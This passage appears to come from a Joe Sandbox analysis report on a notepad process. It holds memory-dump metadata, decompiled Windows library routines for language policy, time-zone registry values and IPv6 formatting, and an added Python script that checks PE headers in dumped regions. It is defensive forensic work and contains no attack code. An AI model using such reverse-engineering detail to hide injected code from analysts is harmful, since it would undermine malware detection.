                                                    • Instruction Fuzzy Hash: 11F0C221328169BBDB58EF1CAD9667A33D5EB98300F54C0B9ED4DC7261D635DD40C290
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction ID: ddb1d08c5f4db260d9e983bd2c577066d6a374cf22f51d775e7616dfab946949
                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction Fuzzy Hash: 5CF082722502089FCB1CDF05C490BBA37F2EB81715F2440ACF50B9F690D73D9881C654
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29e0cb90716eaddee4c603b9d0994bda038a0b46552b56339e6474af4eb17f21
                                                    • Instruction ID: 1bcc71491b33016086f22b5aaa237577d7bc953fece249245a505c96b9360449
                                                    • Opcode Fuzzy Hash: 29e0cb90716eaddee4c603b9d0994bda038a0b46552b56339e6474af4eb17f21
                                                    • Instruction Fuzzy Hash: 97E0D871544B41CFC310DF14C500B19B7F4FF84B10F104479F40697790D7789A04C952
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00B38788(signed int __ecx, void* __edx, signed int _a4) {
                                                    				signed int _v8;
                                                    				short* _v12;
                                                    				void* _v16;
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				char _v36;
                                                    				signed int _v40;
                                                    				char _v44;
                                                    				signed int _v48;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				char _v68;
                                                    				void* _t216;
                                                    				intOrPtr _t231;
                                                    				short* _t235;
                                                    				intOrPtr _t257;
                                                    				short* _t261;
                                                    				intOrPtr _t284;
                                                    				intOrPtr _t288;
                                                    				void* _t314;
                                                    				signed int _t318;
                                                    				short* _t319;
                                                    				intOrPtr _t321;
                                                    				void* _t328;
                                                    				void* _t329;
                                                    				char* _t332;
                                                    				signed int _t333;
                                                    				signed int* _t334;
                                                    				void* _t335;
                                                    				void* _t338;
                                                    				void* _t339;
                                                    
                                                    				_t328 = __edx;
                                                    				_t322 = __ecx;
                                                    				_t318 = 0;
                                                    				_t334 = _a4;
                                                    				_v8 = 0;
                                                    				_v28 = 0;
                                                    				_v48 = 0;
                                                    				_v20 = 0;
                                                    				_v40 = 0;
                                                    				_v32 = 0;
                                                    				_v52 = 0;
                                                    				if(_t334 == 0) {
                                                    					_t329 = 0xc000000d;
                                                    					L49:
                                                    					_t334[0x11] = _v56;
                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                    					_t334[0x12] = _v60;
                                                    					_t334[0x13] = _v28;
                                                    					_t334[0x17] = _v20;
                                                    					_t334[0x16] = _v48;
                                                    					_t334[0x18] = _v40;
                                                    					_t334[0x14] = _v32;
                                                    					_t334[0x15] = _v52;
                                                    					return _t329;
                                                    				}
                                                    				_v56 = 0;
                                                    				if(E00B38460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_v56 = 1;
                                                    					if(_v8 != 0) {
                                                    						_t207 = E00B1E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    					}
                                                    					_push(1);
                                                    					_v8 = _t318;
                                                    					E00B3718A(_t207);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_v60 = _v60 | 0xffffffff;
                                                    				if(E00B38460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                    					_t333 =  *_v8;
                                                    					_v60 = _t333;
                                                    					_t314 = E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					_push(_t333);
                                                    					_v8 = _t318;
                                                    					E00B3718A(_t314);
                                                    					_t335 = _t335 + 4;
                                                    				}
                                                    				_t216 = E00B38460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                    				_t332 = ";";
                                                    				if(_t216 < 0) {
                                                    					L17:
                                                    					if(E00B38460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                    						L30:
                                                    						if(E00B38460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                    							L46:
                                                    							_t329 = 0;
                                                    							L47:
                                                    							if(_v8 != _t318) {
                                                    								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    							}
                                                    							if(_v28 != _t318) {
                                                    								if(_v20 != _t318) {
                                                    									E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    									_v20 = _t318;
                                                    									_v40 = _t318;
                                                    								}
                                                    							}
                                                    							goto L49;
                                                    						}
                                                    						_t231 = _v24;
                                                    						_t322 = _t231 + 4;
                                                    						_push(_t231);
                                                    						_v52 = _t322;
                                                    						E00B3718A(_t231);
                                                    						if(_t322 == _t318) {
                                                    							_v32 = _t318;
                                                    						} else {
                                                    							_v32 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    						}
                                                    						if(_v32 == _t318) {
                                                    							_v52 = _t318;
                                                    							L58:
                                                    							_t329 = 0xc0000017;
                                                    							goto L47;
                                                    						} else {
                                                    							E00B12340(_v32, _v8, _v24);
                                                    							_v16 = _v32;
                                                    							_a4 = _t318;
                                                    							_t235 = E00B2E679(_v32, _t332);
                                                    							while(1) {
                                                    								_t319 = _t235;
                                                    								if(_t319 == 0) {
                                                    									break;
                                                    								}
                                                    								 *_t319 = 0;
                                                    								_t321 = _t319 + 2;
                                                    								E00B1E2A8(_t322,  &_v68, _v16);
                                                    								if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    								_v16 = _t321;
                                                    								_t235 = E00B2E679(_t321, _t332);
                                                    								_pop(_t322);
                                                    							}
                                                    							_t236 = _v16;
                                                    							if( *_v16 != _t319) {
                                                    								E00B1E2A8(_t322,  &_v68, _t236);
                                                    								if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    									_a4 = _a4 + 1;
                                                    								}
                                                    							}
                                                    							if(_a4 == 0) {
                                                    								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                    								_v52 = _v52 & 0x00000000;
                                                    								_v32 = _v32 & 0x00000000;
                                                    							}
                                                    							if(_v8 != 0) {
                                                    								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                    							}
                                                    							_v8 = _v8 & 0x00000000;
                                                    							_t318 = 0;
                                                    							goto L46;
                                                    						}
                                                    					}
                                                    					_t257 = _v24;
                                                    					_t322 = _t257 + 4;
                                                    					_push(_t257);
                                                    					_v40 = _t322;
                                                    					E00B3718A(_t257);
                                                    					_t338 = _t335 + 4;
                                                    					if(_t322 == _t318) {
                                                    						_v20 = _t318;
                                                    					} else {
                                                    						_v20 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    					}
                                                    					if(_v20 == _t318) {
                                                    						_v40 = _t318;
                                                    						goto L58;
                                                    					} else {
                                                    						E00B12340(_v20, _v8, _v24);
                                                    						_v16 = _v20;
                                                    						_a4 = _t318;
                                                    						_t261 = E00B2E679(_v20, _t332);
                                                    						_t335 = _t338 + 0x14;
                                                    						while(1) {
                                                    							_v12 = _t261;
                                                    							if(_t261 == _t318) {
                                                    								break;
                                                    							}
                                                    							_v12 = _v12 + 2;
                                                    							 *_v12 = 0;
                                                    							E00B1E2A8(_v12,  &_v68, _v16);
                                                    							if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    							_v16 = _v12;
                                                    							_t261 = E00B2E679(_v12, _t332);
                                                    							_pop(_t322);
                                                    						}
                                                    						_t269 = _v16;
                                                    						if( *_v16 != _t318) {
                                                    							E00B1E2A8(_t322,  &_v68, _t269);
                                                    							if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    								_a4 = _a4 + 1;
                                                    							}
                                                    						}
                                                    						if(_a4 == _t318) {
                                                    							E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                    							_v40 = _t318;
                                                    							_v20 = _t318;
                                                    						}
                                                    						if(_v8 != _t318) {
                                                    							E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    						}
                                                    						_v8 = _t318;
                                                    						goto L30;
                                                    					}
                                                    				}
                                                    				_t284 = _v24;
                                                    				_t322 = _t284 + 4;
                                                    				_push(_t284);
                                                    				_v48 = _t322;
                                                    				E00B3718A(_t284);
                                                    				_t339 = _t335 + 4;
                                                    				if(_t322 == _t318) {
                                                    					_v28 = _t318;
                                                    				} else {
                                                    					_v28 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                    				}
                                                    				if(_v28 == _t318) {
                                                    					_v48 = _t318;
                                                    					goto L58;
                                                    				} else {
                                                    					E00B12340(_v28, _v8, _v24);
                                                    					_v16 = _v28;
                                                    					_a4 = _t318;
                                                    					_t288 = E00B2E679(_v28, _t332);
                                                    					_t335 = _t339 + 0x14;
                                                    					while(1) {
                                                    						_v12 = _t288;
                                                    						if(_t288 == _t318) {
                                                    							break;
                                                    						}
                                                    						_v12 = _v12 + 2;
                                                    						 *_v12 = 0;
                                                    						E00B1E2A8(_v12,  &_v68, _v16);
                                                    						if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    						_v16 = _v12;
                                                    						_t288 = E00B2E679(_v12, _t332);
                                                    						_pop(_t322);
                                                    					}
                                                    					_t296 = _v16;
                                                    					if( *_v16 != _t318) {
                                                    						E00B1E2A8(_t322,  &_v68, _t296);
                                                    						if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
                                                    							_a4 = _a4 + 1;
                                                    						}
                                                    					}
                                                    					if(_a4 == _t318) {
                                                    						E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                    						_v48 = _t318;
                                                    						_v28 = _t318;
                                                    					}
                                                    					if(_v8 != _t318) {
                                                    						E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                    					}
                                                    					_v8 = _t318;
                                                    					goto L17;
                                                    				}
                                                    			}
                                                    Instruction address column for the function above (one entry per statement; its alignment with the C code was lost in extraction): main body at 0x00b38788 to 0x00b38b59, with out-of-line blocks at 0x00b81ad3 to 0x00b81c16; 0x00000000 marks a statement with no address.

                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Number-Allowed, xrefs: 00B387E6
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00B38914
                                                    • WindowsExcludedProcs, xrefs: 00B387C1
                                                    • Kernel-MUI-Language-SKU, xrefs: 00B389FC
                                                    • Kernel-MUI-Language-Allowed, xrefs: 00B38827
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 63bc8739c81c47b98b0615fe7d1a8dcf72c9e97477e1adb4615ff1448afc41ff
                                                    • Instruction ID: 62c5b3cc9f5e575c618c261969ecc462eca2256c22e8086eeecd1ecd8c9288da
                                                    • Opcode Fuzzy Hash: 63bc8739c81c47b98b0615fe7d1a8dcf72c9e97477e1adb4615ff1448afc41ff
                                                    • Instruction Fuzzy Hash: FFF1C8B2D00209EFCF11EF95C9859EEB7F8FB08300F6444AAF515A7211EB35AA45DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
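The Memory Dump Source entries above record a region at 0x00AF0000 in analysis process 9 (the snapshot file name points at notepad) that the analyzer treats as a PE image ("based on PE: true"), and the strings the decompiled functions reference (the TimeZoneInformation value names, the Kernel-MUI-* policy names) are the ones used by Windows' own runtime library routines. The report itself does not say which module the region is. The check a practitioner wants at this point is whether the header of such a dump names a preferred image base other than the address it was found at (a relocated or manually mapped copy of a library) and which export name it carries. The following is an added example, not code from the report or from the Joe Sandbox product. It assumes the region bytes have already been extracted as a raw in-memory image (RVAs equal offsets; the .sdmp container format is not parsed here), and the PE it builds for input is a synthetic two-section image with a constructed export name, not data from the dump.

```python
# Added example (not part of the Joe Sandbox report): header triage for a dumped
# memory region marked "based on PE: true" at an unexpected address.
import struct


def parse_pe_image(region: bytes, observed_base: int) -> dict:
    """Parse a PE laid out as an in-memory image (RVA == offset into `region`).

    Returns the header's preferred ImageBase, whether the observed base differs
    from it (a relocated or manually mapped copy), the name the export directory
    advertises, and the section table with its executable flag."""
    if region[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
    if region[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    fh = e_lfanew + 4                                    # IMAGE_FILE_HEADER (20 bytes)
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", region, fh)
    opt = fh + 20                                        # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", region, opt)[0]
    if magic == 0x10B:                                   # PE32
        image_base = struct.unpack_from("<I", region, opt + 0x1C)[0]
        ddir = opt + 0x60                                # DataDirectory[0] = exports
    elif magic == 0x20B:                                 # PE32+
        image_base = struct.unpack_from("<Q", region, opt + 0x18)[0]
        ddir = opt + 0x70
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_image = struct.unpack_from("<I", region, opt + 0x38)[0]
    export_rva, export_size = struct.unpack_from("<II", region, ddir)
    export_name = None
    if export_size >= 40 and export_rva + 40 <= len(region):
        name_rva = struct.unpack_from("<I", region, export_rva + 12)[0]  # IMAGE_EXPORT_DIRECTORY.Name
        end = region.index(b"\0", name_rva)
        export_name = region[name_rva:end].decode("ascii", "replace")
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i                    # IMAGE_SECTION_HEADER is 40 bytes
        name = region[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", region, hdr + 8)
        chars = struct.unpack_from("<I", region, hdr + 36)[0]
        sections.append({"name": name, "rva": vaddr, "size": vsize,
                         "executable": bool(chars & 0x20000000)})   # IMAGE_SCN_MEM_EXECUTE
    return {
        "machine": machine, "image_base": image_base, "observed_base": observed_base,
        "relocated": image_base != observed_base, "size_of_image": size_of_image,
        "export_name": export_name, "sections": sections,
    }


def build_sample_image(image_base: int, dll_name: bytes) -> bytes:
    """Constructed minimal PE32 image (.text, .rdata, one export-directory name).

    Synthetic stand-in for the raw bytes of a dumped region; not data from the report."""
    img = bytearray(0x3000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                       # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x84, 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)  # i386, 2 sections, DLL
    opt = 0x98
    struct.pack_into("<H", img, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", img, opt + 0x1C, image_base)           # preferred ImageBase
    struct.pack_into("<I", img, opt + 0x38, len(img))             # SizeOfImage
    struct.pack_into("<I", img, opt + 0x5C, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 0x60, 0x2000, 40)          # export directory RVA/size
    sec = opt + 0xE0
    struct.pack_into("<8sIIII", img, sec, b".text", 0x1000, 0x1000, 0x1000, 0x1000)
    struct.pack_into("<I", img, sec + 36, 0x60000020)             # code | execute | read
    struct.pack_into("<8sIIII", img, sec + 40, b".rdata", 0x1000, 0x2000, 0x1000, 0x2000)
    struct.pack_into("<I", img, sec + 76, 0x40000040)             # initialized data | read
    struct.pack_into("<I", img, 0x2000 + 12, 0x2040)              # IMAGE_EXPORT_DIRECTORY.Name -> 0x2040
    img[0x2040:0x2040 + len(dll_name)] = dll_name
    return bytes(img)


if __name__ == "__main__":
    # Header claims 0x77000000 (assumed value); region observed at the report's 0x00AF0000.
    info = parse_pe_image(build_sample_image(0x77000000, b"example.dll"), 0x00AF0000)
    print(info["export_name"], "relocated" if info["relocated"] else "at preferred base")
```

A region whose header names one base but which sits at another, and whose export name is that of a system DLL already loaded at its normal base elsewhere in the process, is a second copy of that DLL; comparing such a dump against the on-disk file (section hashes, export table) is the natural next step and is not done here.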

                                                    C-Code - Quality: 95%
                                                    			E00BA822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
                                                    				char _v8;
                                                    				void* __ebx;
                                                    				signed int _t41;
                                                    				void* _t42;
                                                    				signed int* _t50;
                                                    				void* _t71;
                                                    				void* _t73;
                                                    				void* _t78;
                                                    				signed int _t81;
                                                    				void* _t84;
                                                    
                                                    				_push(__ecx);
                                                    				_t81 = _a4;
                                                    				_t84 = 0x20;
                                                    				_t71 = E00BC5A34(_t81 + 4, _t84);
                                                    				if(_t71 < _t84) {
                                                    					_t41 = E00BC5A34(_t81 + 0x58, _t84);
                                                    					_pop(_t78);
                                                    					_a4 = _t41;
                                                    					__eflags = _t41 - _t84;
                                                    					if(_t41 >= _t84) {
                                                    						goto L1;
                                                    					} else {
                                                    						_t42 = E00B67DCD(1,  &_v8);
                                                    						__eflags = _t42;
                                                    						if(__eflags >= 0) {
                                                    							__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
                                                    							if(__eflags < 0) {
                                                    								L14:
                                                    								_a4 = 0;
                                                    								_t73 = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
                                                    								__eflags = _t73;
                                                    								if(__eflags >= 0) {
                                                    									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                    									_t50 =  &_a8;
                                                    									goto L16;
                                                    								}
                                                    							} else {
                                                    								_t8 = _t71 + 2; // 0x2
                                                    								__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
                                                    								if(__eflags < 0) {
                                                    									goto L14;
                                                    								} else {
                                                    									_t71 = 4;
                                                    									__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
                                                    									if(__eflags < 0) {
                                                    										goto L14;
                                                    									} else {
                                                    										__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
                                                    										if(__eflags < 0) {
                                                    											goto L14;
                                                    										} else {
                                                    											__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
                                                    											if(__eflags < 0) {
                                                    												goto L14;
                                                    											} else {
                                                    												__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
                                                    												if(__eflags < 0) {
                                                    													goto L14;
                                                    												} else {
                                                    													__eflags = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
                                                    													if(__eflags < 0) {
                                                    														goto L14;
                                                    													} else {
                                                    														__eflags = _a8 - 0x1b0;
                                                    														if(__eflags < 0) {
                                                    															goto L14;
                                                    														} else {
                                                    															_t73 = E00BA810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
                                                    															__eflags = _t73;
                                                    															if(__eflags >= 0) {
                                                    																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                    																_t50 =  &_a4;
                                                    																L16:
                                                    																_t73 = E00BA810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							E00B0F9F0(_v8);
                                                    							_t42 = _t73;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					_t42 = 0xc000000d;
                                                    				}
                                                    				return _t42;
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    • Opcode ID: 0de0e9be4b5f7cc60e890aceac45711c5f770ff83d862cfe0c295191ab33f253
                                                    • Instruction ID: 55874c1c5116116f8e043f1bb647effb4dd46269a550cec67f8bf6567f335e33
                                                    • Opcode Fuzzy Hash: 0de0e9be4b5f7cc60e890aceac45711c5f770ff83d862cfe0c295191ab33f253
                                                    • Instruction Fuzzy Hash: 0041A875348309BEEB119A91CC42FDE7BECEF0AB44F1005A1BA04E5591DFB4DB5097A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E00B513CB(intOrPtr* _a4, intOrPtr _a8) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr* _v16;
                                                    				intOrPtr _v20;
                                                    				char _v24;
                                                    				intOrPtr _t71;
                                                    				signed int _t78;
                                                    				signed int _t86;
                                                    				char _t90;
                                                    				signed int _t91;
                                                    				signed int _t96;
                                                    				intOrPtr _t108;
                                                    				signed int _t114;
                                                    				void* _t115;
                                                    				intOrPtr _t128;
                                                    				intOrPtr* _t129;
                                                    				void* _t130;
                                                    				intOrPtr _t116; // used below but missing from the decompiler's declarations
                                                    				char* _t26; // points at _v24 in the loop counter update below
                                                    
                                                    				_t129 = _a4;
                                                    				_t128 = _a8;
                                                    				_t116 = 0;
                                                    				_t71 = _t128 + 0x5c;
                                                    				_v8 = 8;
                                                    				_v20 = _t71;
                                                    				if( *_t129 == 0) {
                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                    						if(_t96 != 0) {
                                                    							L38:
                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                    								goto L5;
                                                    							} else {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t86 = E00B47707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                    								L36:
                                                    								return _t128 + _t86 * 2;
                                                    							}
                                                    						}
                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                    						if(_t114 == 0) {
                                                    							L33:
                                                    							_t115 = 0xb12926;
                                                    							L35:
                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                    							_t86 = E00B47707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                    							goto L36;
                                                    						}
                                                    						if(_t114 != 0xffff) {
                                                    							_t116 = 0;
                                                    							goto L38;
                                                    						}
                                                    						if(_t114 != 0) {
                                                    							_t115 = 0xb19cac;
                                                    							goto L35;
                                                    						}
                                                    						goto L33;
                                                    					}
                                                    				} else {
                                                    					L5:
                                                    					_a8 = _t116;
                                                    					_a4 = _t116;
                                                    					_v12 = _t116;
                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                    							_v8 = 6;
                                                    						}
                                                    					}
                                                    					_t90 = _v8;
                                                    					if(_t90 <= _t116) {
                                                    						L11:
                                                    						if(_a8 - _a4 <= 1) {
                                                    							_a8 = _t116;
                                                    							_a4 = _t116;
                                                    						}
                                                    						_t91 = 0;
                                                    						if(_v8 <= _t116) {
                                                    							L22:
                                                    							if(_v8 < 8) {
                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                    								_t128 = _t128 + E00B47707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                    							}
                                                    							return _t128;
                                                    						} else {
                                                    							L14:
                                                    							if(_a4 > _t91 || _t91 >= _a8) {
